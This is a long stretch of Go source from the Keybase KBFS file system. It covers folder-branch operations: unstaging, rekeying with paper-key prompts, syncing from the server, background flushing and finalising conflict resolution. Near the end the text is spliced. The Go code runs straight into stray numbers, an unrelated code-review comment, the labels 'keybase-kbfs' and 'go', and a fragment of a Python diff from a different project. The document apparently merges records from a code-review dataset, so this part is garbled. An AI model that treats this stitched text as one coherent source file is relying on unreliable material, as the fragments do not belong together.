		defer fbo.headLock.Unlock(lState)
		err = fbo.setHeadPredecessorLocked(ctx, lState, rmd)
		if err != nil {
			return err
		}
		fbo.setLatestMergedRevisionLocked(ctx, lState, rmd.Revision(), true)
		return nil
	}()
	if err != nil {
		return nil, err
	}

	// Return all new refs
	var unmergedPtrs []BlockPointer
	for _, rmd := range unmergedRmds {
		for _, op := range rmd.data.Changes.Ops {
			for _, ptr := range op.Refs() {
				if ptr != zeroPtr {
					unmergedPtrs = append(unmergedPtrs, ptr)
				}
			}
			for _, update := range op.AllUpdates() {
				if update.Ref != zeroPtr {
					unmergedPtrs = append(unmergedPtrs, update.Ref)
				}
			}
		}
	}

	return unmergedPtrs, nil
}

// unstageLocked abandons the local unmerged branch: it undoes all
// unmerged updates, prunes the branch on the server, fast-forwards to
// the latest merged state, and records a resolutionOp unref'ing the
// now-orphaned blocks.  mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) unstageLocked(ctx context.Context,
	lState *lockState) error {
	fbo.mdWriterLock.AssertLocked(lState)

	// fetch all of my unstaged updates, and undo them one at a time
	bid, wasMasterBranch := fbo.bid, fbo.isMasterBranchLocked(lState)
	unmergedPtrs, err := fbo.undoUnmergedMDUpdatesLocked(ctx, lState)
	if err != nil {
		return err
	}

	// let the server know we no longer have need
	if !wasMasterBranch {
		err = fbo.config.MDOps().PruneBranch(ctx, fbo.id(), bid)
		if err != nil {
			return err
		}
	}

	// now go forward in time, if possible
	err = fbo.getAndApplyMDUpdates(ctx, lState,
		fbo.applyMDUpdatesLocked)
	if err != nil {
		return err
	}

	md, err := fbo.getMDForWriteLocked(ctx, lState)
	if err != nil {
		return err
	}

	// Finally, create a resolutionOp with the newly-unref'd pointers.
	resOp := newResolutionOp()
	for _, ptr := range unmergedPtrs {
		resOp.AddUnrefBlock(ptr)
	}
	md.AddOp(resOp)
	return fbo.finalizeMDWriteLocked(ctx, lState, md, &blockPutState{}, NoExcl)
}

// TODO: remove once we have automatic conflict resolution
func (fbo *folderBranchOps) UnstageForTesting(
	ctx context.Context, folderBranch FolderBranch) (err error) {
	fbo.log.CDebugf(ctx, "UnstageForTesting")
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	if folderBranch != fbo.folderBranch {
		return WrongOpsError{fbo.folderBranch, folderBranch}
	}

	return runUnlessCanceled(ctx, func() error {
		lState := makeFBOLockState()

		if fbo.isMasterBranch(lState) {
			// no-op
			return nil
		}

		if fbo.blocks.GetState(lState) != cleanState {
			return NotPermittedWhileDirtyError{}
		}

		// launch unstaging in a new goroutine, because we don't want to
		// use the provided context because upper layers might ignore our
		// notifications if we do.  But we still want to wait for the
		// context to cancel.
		c := make(chan error, 1)
		freshCtx, cancel := fbo.newCtxWithFBOID()
		defer cancel()
		fbo.log.CDebugf(freshCtx, "Launching new context for UnstageForTesting")
		go func() {
			lState := makeFBOLockState()
			// NOTE(review): the retry wrapper is given the caller's ctx
			// while the inner unstage uses freshCtx — confirm this mix is
			// intentional (the comment above suggests freshCtx should be
			// what drives the work).
			c <- fbo.doMDWriteWithRetry(ctx, lState,
				func(lState *lockState) error {
					return fbo.unstageLocked(freshCtx, lState)
				})
		}()

		select {
		case err := <-c:
			return err
		case <-ctx.Done():
			return ctx.Err()
		}
	})
}

// mdWriterLock must be taken by the caller.
// rekeyLocked performs a rekey of this folder, optionally prompting
// the user for paper keys, and writes the resulting metadata.  If the
// device still can't rekey, it schedules a one-shot retry with
// prompting.  mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) rekeyLocked(ctx context.Context,
	lState *lockState, promptPaper bool) (err error) {
	fbo.mdWriterLock.AssertLocked(lState)

	if !fbo.isMasterBranchLocked(lState) {
		return errors.New("Can't rekey while staged.")
	}

	head := fbo.getHead(lState)
	if head != (ImmutableRootMetadata{}) {
		// If we already have a cached revision, make sure we're
		// up-to-date with the latest revision before inspecting the
		// metadata, since Rekey doesn't let us go into CR mode, and
		// we don't actually get folder update notifications when the
		// rekey bit is set, just a "folder needs rekey" update.
		if err := fbo.getAndApplyMDUpdates(
			ctx, lState, fbo.applyMDUpdatesLocked); err != nil {
			if applyErr, ok := err.(MDRevisionMismatch); !ok ||
				applyErr.rev != applyErr.curr {
				return err
			}
		}
	}

	md, rekeyWasSet, err := fbo.getMDForRekeyWriteLocked(ctx, lState)
	if err != nil {
		return err
	}

	if fbo.rekeyWithPromptTimer != nil {
		if !promptPaper {
			fbo.log.CDebugf(ctx, "rekeyWithPrompt superseded before it fires.")
		} else if !md.IsRekeySet() {
			fbo.rekeyWithPromptTimer.Stop()
			fbo.rekeyWithPromptTimer = nil
			// If the rekey bit isn't set, then some other device
			// already took care of our request, and we can stop
			// early.  Note that if this FBO never registered for
			// updates, then we might not yet have seen the update, in
			// which case we'll still try to rekey but it will fail as
			// a conflict.
			fbo.log.CDebugf(ctx, "rekeyWithPrompt not needed because the "+
				"rekey bit was already unset.")
			return nil
		}
	}

	rekeyDone, tlfCryptKey, err := fbo.config.KeyManager().
		Rekey(ctx, md, promptPaper)

	stillNeedsRekey := false
	switch err.(type) {
	case nil:
		// TODO: implement a "forced" option that rekeys even when the
		// devices haven't changed?
		if !rekeyDone {
			fbo.log.CDebugf(ctx, "No rekey necessary")
			return nil
		}
		// Clear the rekey bit if any.
		md.clearRekeyBit()
		_, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx)
		if err != nil {
			return err
		}
		// Readers can't clear the last revision, because:
		// 1) They don't have access to the writer metadata, so can't clear the
		//    block changes.
		// 2) Readers need the MetadataFlagWriterMetadataCopied bit set for
		//    MDServer to authorize the write.
		// Without this check, MDServer returns an Unauthorized error.
		if md.GetTlfHandle().IsWriter(uid) {
			md.clearLastRevision()
		}

	case RekeyIncompleteError:
		if !rekeyDone && rekeyWasSet {
			// The rekey bit was already set, and there's nothing else
			// we can to do, so don't put any new revisions.
			fbo.log.CDebugf(ctx, "No further rekey possible by this user.")
			return nil
		}

		// Rekey incomplete, fallthrough without early exit, to ensure
		// we write the metadata with any potential changes
		fbo.log.CDebugf(ctx,
			"Rekeyed reader devices, but still need writer rekey")

	case NeedOtherRekeyError:
		stillNeedsRekey = true
	case NeedSelfRekeyError:
		stillNeedsRekey = true

	default:
		if err == context.DeadlineExceeded {
			fbo.log.CDebugf(ctx, "Paper key prompt timed out")
			// Reschedule the prompt in the timeout case.
			stillNeedsRekey = true
		} else {
			return err
		}
	}

	if stillNeedsRekey {
		fbo.log.CDebugf(ctx, "Device doesn't have access to rekey")
		// If we didn't have read access, then we don't have any
		// unlocked paper keys.  Wait for some time, and then if we
		// still aren't rekeyed, try again but this time prompt the
		// user for any known paper keys.  We do this even if the
		// rekey bit is already set, since we may have restarted since
		// the previous rekey attempt, before prompting for the paper
		// key.  Only schedule this as a one-time event, since direct
		// folder accesses from the user will also cause a
		// rekeyWithPrompt.
		//
		// Only ever set the timer once.
		if fbo.rekeyWithPromptTimer == nil {
			d := fbo.config.RekeyWithPromptWaitTime()
			fbo.log.CDebugf(ctx, "Scheduling a rekeyWithPrompt in %s", d)
			fbo.rekeyWithPromptTimer = time.AfterFunc(d, fbo.rekeyWithPrompt)
		}

		if rekeyWasSet {
			// Devices not yet keyed shouldn't set the rekey bit again
			fbo.log.CDebugf(ctx, "Rekey bit already set")
			return nil
		}
		// This device hasn't been keyed yet, fall through to set the rekey bit
	}

	// add an empty operation to satisfy assumptions elsewhere
	md.AddOp(newRekeyOp())

	// we still let readers push a new md block that we validate against reader
	// permissions
	err = fbo.finalizeMDRekeyWriteLocked(ctx, lState, md)
	if err != nil {
		return err
	}

	// cache any new TLF crypt key
	if tlfCryptKey != nil {
		keyGen := md.LatestKeyGeneration()
		err = fbo.config.KeyCache().PutTLFCryptKey(md.TlfID(), keyGen, *tlfCryptKey)
		if err != nil {
			return err
		}
	}

	// send rekey finish notification
	handle := md.GetTlfHandle()
	fbo.config.Reporter().Notify(ctx,
		rekeyNotification(ctx, fbo.config, handle, true))
	if !stillNeedsRekey && fbo.rekeyWithPromptTimer != nil {
		fbo.log.CDebugf(ctx, "Scheduled rekey timer no longer needed")
		fbo.rekeyWithPromptTimer.Stop()
		fbo.rekeyWithPromptTimer = nil
	}
	return nil
}

// rekeyWithPrompt is the time.AfterFunc callback scheduled by
// rekeyLocked; it retries the rekey with paper-key prompting enabled,
// under a fresh background context with a bounded timeout.
func (fbo *folderBranchOps) rekeyWithPrompt() {
	var err error
	ctx := ctxWithRandomIDReplayable(
		context.Background(), CtxRekeyIDKey, CtxRekeyOpID, fbo.log)

	// Only give the user limited time to enter their paper key, so we
	// don't wait around forever.
	d := fbo.config.RekeyWithPromptWaitTime()
	ctx, cancel := context.WithTimeout(ctx, d)
	defer cancel()

	if ctx, err = NewContextWithCancellationDelayer(ctx); err != nil {
		panic(err)
	}

	fbo.log.CDebugf(ctx, "rekeyWithPrompt")
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	err = fbo.doMDWriteWithRetryUnlessCanceled(ctx,
		func(lState *lockState) error {
			return fbo.rekeyLocked(ctx, lState, true)
		})
}

// Rekey rekeys the given folder.
func (fbo *folderBranchOps) Rekey(ctx context.Context, tlf TlfID) (err error) {
	fbo.log.CDebugf(ctx, "Rekey")
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()
	// Rekey is only valid for the master branch of the TLF this
	// instance serves; anything else is rejected up front.
	fb := FolderBranch{tlf, MasterBranch}
	if fb != fbo.folderBranch {
		return WrongOpsError{fbo.folderBranch, fb}
	}
	// Run the actual rekey under the MD writer lock, retrying on
	// conflicts; promptPaper=false on this path.
	return fbo.doMDWriteWithRetryUnlessCanceled(ctx,
		func(lState *lockState) error {
			return fbo.rekeyLocked(ctx, lState, false)
		})
}

// SyncFromServerForTesting blocks until this folder-branch is fully
// caught up with the server: conflict resolution has completed (we
// must end on the master branch), no dirty blocks remain, the TLF
// journal and MD flushes are drained, all merged MD updates are
// applied, and outstanding block archiving/deletion, edit-history,
// and quota-reclamation work has finished.
func (fbo *folderBranchOps) SyncFromServerForTesting(
	ctx context.Context, folderBranch FolderBranch) (err error) {
	fbo.log.CDebugf(ctx, "SyncFromServerForTesting")
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	if folderBranch != fbo.folderBranch {
		return WrongOpsError{fbo.folderBranch, folderBranch}
	}

	lState := makeFBOLockState()

	// If we're staged (unmerged), wait for conflict resolution to
	// bring us back to the master branch.
	if !fbo.isMasterBranch(lState) {
		if err := fbo.cr.Wait(ctx); err != nil {
			return err
		}
		// If we are still staged after the wait, then we have a problem.
		if !fbo.isMasterBranch(lState) {
			return fmt.Errorf("Conflict resolution didn't take us out of " +
				"staging.")
		}
	}

	// Refuse to sync while there are unsynced local writes.
	dirtyRefs := fbo.blocks.GetDirtyRefs(lState)
	if len(dirtyRefs) > 0 {
		for _, ref := range dirtyRefs {
			fbo.log.CDebugf(ctx, "DeCache entry left: %v", ref)
		}
		return errors.New("Can't sync from server while dirty.")
	}

	// A journal flush, if needed.
	if err := WaitForTLFJournal(ctx, fbo.config, fbo.id(),
		fbo.log); err != nil {
		return err
	}

	if err := fbo.mdFlushes.Wait(ctx); err != nil {
		return err
	}

	// Pull and apply any merged MD updates we don't have yet.
	if err := fbo.getAndApplyMDUpdates(ctx, lState,
		fbo.applyMDUpdates); err != nil {
		if applyErr, ok := err.(MDRevisionMismatch); ok {
			if applyErr.rev == applyErr.curr {
				fbo.log.CDebugf(ctx, "Already up-to-date with server")
				return nil
			}
		}
		return err
	}

	// Wait for all the asynchronous block archiving and quota
	// reclamation to hit the block server.
	if err := fbo.fbm.waitForArchives(ctx); err != nil {
		return err
	}
	if err := fbo.fbm.waitForDeletingBlocks(ctx); err != nil {
		return err
	}
	if err := fbo.editHistory.Wait(ctx); err != nil {
		return err
	}
	if err := fbo.fbm.waitForQuotaReclamations(ctx); err != nil {
		return err
	}

	// A second journal flush if needed, to clear out any
	// archive/remove calls caused by the above operations.
	return WaitForTLFJournal(ctx, fbo.config, fbo.id(), fbo.log)
}

// CtxFBOTagKey is the type used for unique context tags within folderBranchOps
type CtxFBOTagKey int

const (
	// CtxFBOIDKey is the type of the tag for unique operation IDs
	// within folderBranchOps.
	CtxFBOIDKey CtxFBOTagKey = iota
)

// CtxFBOOpID is the display name for the unique operation
// folderBranchOps ID tag.
const CtxFBOOpID = "FBOID"

// ctxWithFBOID returns a copy of ctx tagged with a fresh, replayable
// random operation ID under CtxFBOIDKey.
func (fbo *folderBranchOps) ctxWithFBOID(ctx context.Context) context.Context {
	return ctxWithRandomIDReplayable(ctx, CtxFBOIDKey, CtxFBOOpID, fbo.log)
}

// newCtxWithFBOID builds a background context tagged with an FBOID,
// wrapped in a cancellation delayer, along with its cancel function.
func (fbo *folderBranchOps) newCtxWithFBOID() (context.Context, context.CancelFunc) {
	// No need to call NewContextReplayable since ctxWithFBOID calls
	// ctxWithRandomIDReplayable, which attaches replayably.
	ctx := fbo.ctxWithFBOID(context.Background())
	ctx, cancelFunc := context.WithCancel(ctx)
	ctx, err := NewContextWithCancellationDelayer(ctx)
	if err != nil {
		panic(err)
	}
	return ctx, cancelFunc
}

// Run the passed function with a context that's canceled on shutdown.
func (fbo *folderBranchOps) runUnlessShutdown(fn func(ctx context.Context) error) error {
	ctx, cancelFunc := fbo.newCtxWithFBOID()
	defer cancelFunc()
	// Buffered so the goroutine's send always succeeds even if we
	// return early on the shutdown path below.
	errChan := make(chan error, 1)
	go func() {
		errChan <- fn(ctx)
	}()

	select {
	case err := <-errChan:
		return err
	case <-fbo.shutdownChan:
		return ShutdownHappenedError{}
	}
}

// registerAndWaitForUpdates loops registering with the server for MD
// updates and processing them as they arrive, retrying with
// exponential backoff after failures. It closes updateDoneChan when
// it exits, and waits for its child goroutine before returning.
func (fbo *folderBranchOps) registerAndWaitForUpdates() {
	defer close(fbo.updateDoneChan)
	childDone := make(chan struct{})
	err := fbo.runUnlessShutdown(func(ctx context.Context) error {
		defer close(childDone)
		// If we fail to register for or process updates, try again
		// with an exponential backoff, so we don't overwhelm the
		// server or ourselves with too many attempts in a hopeless
		// situation.
		expBackoff := backoff.NewExponentialBackOff()
		// Never give up hope until we shut down
		expBackoff.MaxElapsedTime = 0
		// Register and wait in a loop unless we hit an unrecoverable error
		for {
			err := backoff.RetryNotifyWithContext(ctx, func() error {
				// Replace the FBOID one with a fresh id for every attempt
				newCtx := fbo.ctxWithFBOID(ctx)
				updateChan, err := fbo.registerForUpdates(newCtx)
				if err != nil {
					select {
					case <-ctx.Done():
						// Shortcut the retry, we're done.
						return nil
					default:
						return err
					}
				}
				err = fbo.waitForAndProcessUpdates(newCtx, updateChan)
				if _, ok := err.(UnmergedError); ok {
					// skip the back-off timer and continue directly to next
					// registerForUpdates
					return nil
				}
				select {
				case <-ctx.Done():
					// Shortcut the retry, we're done.
					return nil
				default:
					return err
				}
			},
				expBackoff,
				func(err error, nextTime time.Duration) {
					fbo.log.CDebugf(ctx,
						"Retrying registerForUpdates in %s due to err: %v",
						nextTime, err)
				})
			if err != nil {
				return err
			}
		}
	})

	if err != nil && err != context.Canceled {
		fbo.log.CWarningf(context.Background(),
			"registerAndWaitForUpdates failed unexpectedly with an error: %v",
			err)
	}
	<-childDone
}

// registerForUpdates subscribes to MD updates from the server,
// starting after the latest merged revision we currently know about.
func (fbo *folderBranchOps) registerForUpdates(ctx context.Context) (
	updateChan <-chan error, err error) {
	lState := makeFBOLockState()
	currRev := fbo.getCurrMDRevision(lState)
	fbo.log.CDebugf(ctx, "Registering for updates (curr rev = %d)", currRev)
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()
	// RegisterForUpdate will itself retry on connectivity issues
	return fbo.config.MDServer().RegisterForUpdate(ctx, fbo.id(),
		fbo.getLatestMergedRevision(lState))
}

// waitForAndProcessUpdates waits on the server's update channel and
// applies new merged MD updates when signaled. It honors pause
// requests on updatePauseChan, and returns after a successful apply,
// on error, or when ctx is done.
func (fbo *folderBranchOps) waitForAndProcessUpdates(
	ctx context.Context, updateChan <-chan error) (err error) {
	// successful registration; now, wait for an update or a shutdown
	fbo.log.CDebugf(ctx, "Waiting for updates")
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	lState := makeFBOLockState()

	for {
		select {
		case err := <-updateChan:
			fbo.log.CDebugf(ctx, "Got an update: %v", err)
			if err != nil {
				return err
			}
			// Getting and applying the updates requires holding
			// locks, so make sure it doesn't take too long.
			ctx, cancel := context.WithTimeout(ctx, backgroundTaskTimeout)
			defer cancel()
			err = fbo.getAndApplyMDUpdates(ctx, lState, fbo.applyMDUpdates)
			if err != nil {
				fbo.log.CDebugf(ctx, "Got an error while applying "+
					"updates: %v", err)
				return err
			}
			return nil
		case unpause := <-fbo.updatePauseChan:
			fbo.log.CInfof(ctx, "Updates paused")
			// wait to be unpaused
			select {
			case <-unpause:
				fbo.log.CInfof(ctx, "Updates unpaused")
			case <-ctx.Done():
				return ctx.Err()
			}
		case <-ctx.Done():
			return ctx.Err()
		}
	}
}

// backgroundFlusher periodically syncs dirty files, waking up every
// betweenFlushes, on a force-sync signal, or immediately when the
// dirty block cache reports a full buffer. It panics if the same set
// of dirty refs makes no progress for 10 consecutive iterations, and
// exits only on shutdown.
func (fbo *folderBranchOps) backgroundFlusher(betweenFlushes time.Duration) {
	ticker := time.NewTicker(betweenFlushes)
	defer ticker.Stop()
	lState := makeFBOLockState()
	var prevDirtyRefMap map[blockRef]bool
	sameDirtyRefCount := 0
	for {
		doSelect := true
		if fbo.blocks.GetState(lState) == dirtyState &&
			fbo.config.DirtyBlockCache().ShouldForceSync(fbo.id()) {
			// We have dirty files, and the system has a full buffer,
			// so don't bother waiting for a signal, just get right to
			// the main attraction.
			doSelect = false
		}

		if doSelect {
			select {
			case <-ticker.C:
			case <-fbo.forceSyncChan:
			case <-fbo.shutdownChan:
				return
			}
		}

		dirtyRefs := fbo.blocks.GetDirtyRefs(lState)
		if len(dirtyRefs) == 0 {
			sameDirtyRefCount = 0
			continue
		}

		// Make sure we are making some progress
		currDirtyRefMap := make(map[blockRef]bool)
		for _, ref := range dirtyRefs {
			currDirtyRefMap[ref] = true
		}
		if reflect.DeepEqual(currDirtyRefMap, prevDirtyRefMap) {
			sameDirtyRefCount++
		} else {
			sameDirtyRefCount = 0
		}
		if sameDirtyRefCount >= 10 {
			panic(fmt.Sprintf("Making no Sync progress on dirty refs: %v",
				dirtyRefs))
		}
		prevDirtyRefMap = currDirtyRefMap

		fbo.runUnlessShutdown(func(ctx context.Context) (err error) {
			// Denote that these are coming from a background
			// goroutine, not directly from any user.
			ctx = NewContextReplayable(ctx,
				func(ctx context.Context) context.Context {
					return context.WithValue(ctx, CtxBackgroundSyncKey, "1")
				})
			// Just in case network access or a bug gets stuck for a
			// long time, time out the sync eventually.
			longCtx, longCancel :=
				context.WithTimeout(ctx, backgroundTaskTimeout)
			defer longCancel()

			// Make sure this loop doesn't starve user requests for
			// too long.  But use the longer-timeout version in the
			// actual Sync command, to avoid unnecessary errors.
			shortCtx, shortCancel := context.WithTimeout(ctx, 1*time.Second)
			defer shortCancel()
			for _, ref := range dirtyRefs {
				select {
				case <-shortCtx.Done():
					fbo.log.CDebugf(ctx,
						"Stopping background sync early due to timeout")
					return nil
				default:
				}

				node := fbo.nodeCache.Get(ref)
				if node == nil {
					continue
				}

				err := fbo.Sync(longCtx, node)
				if err != nil {
					// Just log the warning and keep trying to
					// sync the rest of the dirty files.
					p := fbo.nodeCache.PathFromNode(node)
					fbo.log.CWarningf(ctx, "Couldn't sync dirty file with "+
						"ref=%v, nodeID=%p, and path=%v: %v",
						ref, node.GetID(), p, err)
				}
			}
			return nil
		})
	}
}

// blockUnmergedWrites stalls new MD writes by taking the MD writer lock.
func (fbo *folderBranchOps) blockUnmergedWrites(lState *lockState) {
	fbo.mdWriterLock.Lock(lState)
}

// unblockUnmergedWrites releases the lock taken by blockUnmergedWrites.
func (fbo *folderBranchOps) unblockUnmergedWrites(lState *lockState) {
	fbo.mdWriterLock.Unlock(lState)
}

// finalizeResolutionLocked finalizes a conflict resolution: caches
// the resolution blocks, puts the new merged MD (past the journal, if
// one is active), prunes the unmerged branch, queues a rekey if
// needed, updates the local head, archives the old unreferenced
// blocks, and sends local notifications for newOps. Callers must
// hold mdWriterLock.
func (fbo *folderBranchOps) finalizeResolutionLocked(ctx context.Context,
	lState *lockState, md *RootMetadata, bps *blockPutState,
	newOps []op) error {
	fbo.mdWriterLock.AssertLocked(lState)

	// Put the blocks into the cache so that, even if we fail below,
	// future attempts may reuse the blocks.
	err := fbo.finalizeBlocks(bps)
	if err != nil {
		return err
	}

	// Last chance to get pre-empted.
	select {
	case <-ctx.Done():
		return ctx.Err()
	default:
	}

	mdOps := fbo.config.MDOps()
	if jServer, err := GetJournalServer(fbo.config); err == nil {
		// Switch to the non-journaled MDOps after flushing all the
		// resolution block writes -- resolutions must go straight
		// through to the server or else the journal will get
		// confused.
		if err = jServer.Wait(ctx, fbo.id()); err != nil {
			return err
		}
		mdOps = jServer.delegateMDOps
	}

	// Put the MD.  If there's a conflict, abort the whole process and
	// let CR restart itself.
	mdID, err := mdOps.Put(ctx, md)
	doUnmergedPut := isRevisionConflict(err)
	if doUnmergedPut {
		fbo.log.CDebugf(ctx, "Got a conflict after resolution; aborting CR")
		return err
	}
	if err != nil {
		return err
	}
	err = mdOps.PruneBranch(ctx, fbo.id(), fbo.bid)
	if err != nil {
		return err
	}

	// Queue a rekey if the bit was set.
	if md.IsRekeySet() {
		defer fbo.config.RekeyQueue().Enqueue(md.TlfID())
	}

	md.swapCachedBlockChanges()

	// Set the head to the new MD.
	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)
	irmd := MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now())
	err = fbo.setHeadConflictResolvedLocked(ctx, lState, irmd)
	if err != nil {
		fbo.log.CWarningf(ctx, "Couldn't set local MD head after a "+
			"successful put: %v", err)
		return err
	}
	fbo.setBranchIDLocked(lState, NullBranchID)

	// Archive the old, unref'd blocks (the revision went straight to
	// the server, so we know it is merged).
	fbo.fbm.archiveUnrefBlocks(irmd.ReadOnly())

	// notifyOneOp for every fixed-up merged op.
	for _, op := range newOps {
		fbo.notifyOneOpLocked(ctx, lState, op, irmd)
	}
	fbo.editHistory.UpdateHistory(ctx, []ImmutableRootMetadata{irmd})
	return nil
}

// finalizeResolution caches all the blocks, and writes the new MD to
// the merged branch, failing if there is a conflict.  It also sends
// out the given newOps notifications locally.  This is used for
// completing conflict resolution.
func (fbo *folderBranchOps) finalizeResolution(ctx context.Context, lState *lockState, md *RootMetadata, bps *blockPutState, newOps []op) error { // Take the writer lock. fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.finalizeResolutionLocked(ctx, lState, md, bps, newOps) } func (fbo *folderBranchOps) unstageAfterFailedResolution(ctx context.Context, lState *lockState) error { // Take the writer lock. fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) // Last chance to get pre-empted. select { case <-ctx.Done(): return ctx.Err() default: } fbo.log.CWarningf(ctx, "Unstaging branch %s after a resolution failure", fbo.bid) return fbo.unstageLocked(ctx, lState) } func (fbo *folderBranchOps) onTLFBranchChange(newBID BranchID) { ctx, cancelFunc := fbo.newCtxWithFBOID() defer cancelFunc() // This only happens on a `PruneBranch` call, in which case we // would have already updated fbo's local view of the branch/head. if newBID == NullBranchID { fbo.log.CDebugf(ctx, "Ignoring branch change back to master") return } lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) fbo.log.CDebugf(ctx, "Journal branch change: %s", newBID) if !fbo.isMasterBranchLocked(lState) { if fbo.bid == newBID { fbo.log.CDebugf(ctx, "Already on branch %s", newBID) return } panic(fmt.Sprintf("Cannot switch to branch %s while on branch %s", newBID, fbo.bid)) } md, err := fbo.config.MDOps().GetUnmergedForTLF(ctx, fbo.id(), newBID) if err != nil { fbo.log.CWarningf(ctx, "No unmerged head on journal branch change (bid=%s)", newBID) return } if md == (ImmutableRootMetadata{}) || md.MergedStatus() != Unmerged || md.BID() != newBID { // This can happen if CR got kicked off in some other way and // completed before we took the lock to process this // notification. 
fbo.log.CDebugf(ctx, "Ignoring stale branch change: md=%v, newBID=%d", md, newBID) return } // Everything we thought we knew about quota reclamation is now // called into question. fbo.fbm.clearLastQRData() // Kick off conflict resolution and set the head to the correct branch. fbo.setBranchIDLocked(lState, newBID) fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized) fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) // We don't currently know the latest merged revision, because we // may have been journaled for a while. We will know it once we // get the latest merged update or when conflict resolution // completes. fbo.setLatestMergedRevisionLocked(ctx, lState, MetadataRevisionUninitialized, true) err = fbo.setHeadSuccessorLocked(ctx, lState, md, true /*rebased*/) if err != nil { fbo.log.CWarningf(ctx, "Could not set head on journal branch change: %v", err) return } } func (fbo *folderBranchOps) handleMDFlush(ctx context.Context, bid BranchID, rev MetadataRevision) { defer fbo.mdFlushes.Done() fbo.log.CDebugf(ctx, "Archiving references for flushed MD revision %d", rev) // Get that revision. rmd, err := getSingleMD(ctx, fbo.config, fbo.id(), NullBranchID, rev, Merged) if err != nil { fbo.log.CWarningf(ctx, "Couldn't get revision %d for archiving: %v", rev, err) return } // We must take the lock so that other users, like exclusive file // creation, can wait for the journal to flush while holding the // lock, and be guaranteed it will stay flushed. 
lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) fbo.fbm.archiveUnrefBlocks(rmd.ReadOnly()) } func (fbo *folderBranchOps) onMDFlush(bid BranchID, rev MetadataRevision) { ctx, cancelFunc := fbo.newCtxWithFBOID() defer cancelFunc() if bid != NullBranchID { fbo.log.CDebugf(ctx, "Ignoring MD flush on branch %v for revision %d", bid, rev) return } fbo.mdFlushes.Add(1) go fbo.handleMDFlush(ctx, bid, rev) } // GetUpdateHistory implements the KBFSOps interface for folderBranchOps func (fbo *folderBranchOps) GetUpdateHistory(ctx context.Context, folderBranch FolderBranch) (history TLFUpdateHistory, err error) { fbo.log.CDebugf(ctx, "GetUpdateHistory") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if folderBranch != fbo.folderBranch { return TLFUpdateHistory{}, WrongOpsError{fbo.folderBranch, folderBranch} } rmds, err := getMergedMDUpdates(ctx, fbo.config, fbo.id(), MetadataRevisionInitial) if err != nil { return TLFUpdateHistory{}, err } if len(rmds) > 0 { rmd := rmds[len(rmds)-1] history.ID = rmd.TlfID().String() history.Name = rmd.GetTlfHandle().GetCanonicalPath() } history.Updates = make([]UpdateSummary, 0, len(rmds)) writerNames := make(map[keybase1.UID]string) for _, rmd := range rmds { writer, ok := writerNames[rmd.LastModifyingWriter()] if !ok { name, err := fbo.config.KBPKI(). 
GetNormalizedUsername(ctx, rmd.LastModifyingWriter()) if err != nil { return TLFUpdateHistory{}, err } writer = string(name) writerNames[rmd.LastModifyingWriter()] = writer } updateSummary := UpdateSummary{ Revision: rmd.Revision(), Date: time.Unix(0, rmd.data.Dir.Mtime), Writer: writer, LiveBytes: rmd.DiskUsage(), Ops: make([]OpSummary, 0, len(rmd.data.Changes.Ops)), } for _, op := range rmd.data.Changes.Ops { opSummary := OpSummary{ Op: op.String(), Refs: make([]string, 0, len(op.Refs())), Unrefs: make([]string, 0, len(op.Unrefs())), Updates: make(map[string]string), } for _, ptr := range op.Refs() { opSummary.Refs = append(opSummary.Refs, ptr.String()) } for _, ptr := range op.Unrefs() { opSummary.Unrefs = append(opSummary.Unrefs, ptr.String()) } for _, update := range op.AllUpdates() { opSummary.Updates[update.Unref.String()] = update.Ref.String() } updateSummary.Ops = append(updateSummary.Ops, opSummary) } history.Updates = append(history.Updates, updateSummary) } return history, nil } // GetEditHistory implements the KBFSOps interface for folderBranchOps func (fbo *folderBranchOps) GetEditHistory(ctx context.Context, folderBranch FolderBranch) (edits TlfWriterEdits, err error) { fbo.log.CDebugf(ctx, "GetEditHistory") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if folderBranch != fbo.folderBranch { return nil, WrongOpsError{fbo.folderBranch, folderBranch} } lState := makeFBOLockState() head, err := fbo.getMDForReadHelper(ctx, lState, mdReadNeedIdentify) if err != nil { return nil, err } return fbo.editHistory.GetComplete(ctx, head) } // PushConnectionStatusChange pushes human readable connection status changes. func (fbo *folderBranchOps) PushConnectionStatusChange(service string, newStatus error) { fbo.config.KBFSOps().PushConnectionStatusChange(service, newStatus) }
1
13,276
Wait — it looks like this function is called _every_ time we fetch the root node, which means we do an MD head fetch on every root-node fetch? Not for this PR, but it seems like we should make that unnecessary, since this function only ever does anything when head is `nil`, i.e. the first time. Maybe add a TODO?
keybase-kbfs
go
@@ -1948,9 +1948,9 @@ class DomainNameListField(StrLenField): islist = 1 padded_unit = 8 - def __init__(self, name, default, fld=None, length_from=None, padded=False): # noqa: E501 + def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 self.padded = padded - StrLenField.__init__(self, name, default, fld, length_from) + StrLenField.__init__(self, name, default, length_from=length_from) def i2len(self, pkt, x): return len(self.i2m(pkt, x))
1
